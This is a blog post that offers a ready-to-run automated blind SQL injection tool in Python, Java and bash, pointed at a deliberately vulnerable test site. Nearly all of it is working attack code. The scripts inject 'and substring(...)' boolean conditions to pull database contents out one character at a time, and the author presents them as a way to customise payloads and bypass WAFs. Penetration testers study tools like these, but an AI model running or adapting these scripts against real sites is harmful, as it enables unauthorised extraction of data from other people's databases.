Automated Blind SQL Injector
There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.
This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py
import urllib2
import re
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/
url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
for j in range(32, 127):
if(chr(j).isupper()):
continue
sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
target = url + sql
req = urllib2.Request(target)
# If cookies exists
# req.add_header('Cookie','value=1;value=2')
page = urllib2.urlopen(req)
html = page.read()
try:
re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
print ('Found: ' + chr(j))
result += chr(j)
except:
pass
print (result)
This is the Java version I wrote. The URL and the length is hard coded. Enter the URL and compile, next run
java BSSQL 20 "select user()"
https://github.com/OsandaMalith/BSSQLi/blob/master/BSSQL.java
import java.net.*;
import java.io.*;
// CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
// https://creativecommons.org/licenses/by/2.0/
/*
The URL and the true string is being hardcoded. After compiling run like this:
java BSSQL 20 "select table_name from information_schema.tables where table_schema=database() limit 0,1"
Result:
artists
Done!
*/
public class BSSQL {
private static String url = "http://testphp.vulnweb.com/artists.php?artist=2"; // your payload
private static String trueString = "Blad3"; // Text or html in the true condition
private static String hex;
private static char ch;
public static void main(String[] args) throws Exception {
int maxLength = 0;
String payload = "";
if (args.length < 2) {
System.err.println("Usage: " + BSSQL.class.getName() + " length " + "\"payload\"");
System.exit(1);
}
try {
maxLength = Integer.parseInt(args[0]);
} catch (NumberFormatException e) {
System.err.println("Argument" + args[0] + " must be an integer.");
System.exit(1);
}
payload = args[1];
System.out.println("Result:");
for (int j = 1; j <= maxLength; j++) {
for (int i = 32; i < 127; i++) {
if (Character.isUpperCase((char) i)) {
continue;
}
ch = (char) i;
hex = String.format("0x%2x", (int) ch);
String p = " and substring((" + payload + ")," + Integer.toString(j) + ",1)="
+ hex + "-- -";
String host = url + p;
URL target = new URL(host);
URLConnection conn = target.openConnection();
// conn.setRequestProperty("Cookie", "name1=value1; name2=value2");
conn.connect();
BufferedReader in = new BufferedReader(new InputStreamReader(
conn.getInputStream()));
String inputLine;
while ((inputLine = in.readLine()) != null) {
if (inputLine.contains(trueString)) {
System.out.print(Character.toString((char) i));
break;
}
}
in.close();
}
}
System.out.println("\nDone!");
}
}
This is the bash version , it's faster than the above two. https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.sh
#!/bin/bash
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/
#./bssqli.sh 20 "select user()"
export URL="http://testphp.vulnweb.com/artists.php?artist=2"
export truestring="Blad3"
export maxlength=$1
export result=""
export query=$2
charset=`echo {0..9} {A..x} \. \: \, \- \_ \@`
for ((j=1;j<$maxlength;j+=1)); do
for i in $charset; do
export str=`echo -n $i| od -A n -t x1 |sed 's/ //g'`
export hex=0x$str
curl -s "$URL and substring(($query),$j,1)=$hex-- -" | grep "$truestring" &> /dev/null
if [ "$?" == "0" ]
then
echo Found: $i
export result+=$i
break
fi
done
done
echo Result: $result
